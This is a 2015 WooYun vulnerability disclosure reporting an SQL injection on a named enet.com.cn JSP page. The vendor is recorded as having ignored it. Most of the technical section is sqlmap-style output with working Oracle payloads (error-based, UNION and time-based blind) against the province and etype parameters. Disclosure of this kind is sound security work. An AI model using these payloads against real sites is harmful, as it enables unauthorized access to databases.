当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130524

漏洞标题:硅谷动力某处SQL时间盲注

相关厂商:enet.com.cn

漏洞作者: 0x 80

提交时间:2015-07-30 19:31

修复时间:2015-08-04 19:32

公开时间:2015-08-04 19:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

硅谷动力某处SQL时间盲注

详细说明:

http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200
其中fromyear=存在时间盲注
跑下

Place: POST
Parameter: etype
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: province=&etype=' AND 8797=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||
CHR(97)||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (8797=8797) THEN 1 ELSE
0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FR
OM DUAL) AND 'HPbf'='HPbf&fromyear=200
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: province=&etype=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)|
|CHR(105)||CHR(121)||CHR(58)||CHR(66)||CHR(72)||CHR(83)||CHR(72)||CHR(101)||CHR(
97)||CHR(77)||CHR(121)||CHR(115)||CHR(110)||CHR(58)||CHR(102)||CHR(108)||CHR(108
)||CHR(58),NULL FROM DUAL-- &fromyear=200
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: province=&etype=-2167' OR 9487=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||C
HR(102)||CHR(115)||CHR(75),5) AND 'Nlvw'='Nlvw&fromyear=200
Place: POST
Parameter: province
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: province=' AND 7837=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)
||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (7837=7837) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL
) AND 'SlMJ'='SlMJ&etype=&fromyear=200
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: province=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)||CHR(10
5)||CHR(121)||CHR(58)||CHR(89)||CHR(99)||CHR(82)||CHR(105)||CHR(108)||CHR(69)||C
HR(113)||CHR(119)||CHR(84)||CHR(103)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR
(58),NULL FROM DUAL-- &etype=&fromyear=200
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: province=' AND 2030=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(65)||CHR
(68)||CHR(67),5) AND 'DZsv'='DZsv&etype=&fromyear=200

漏洞证明:

235.png


http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-04 19:32

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论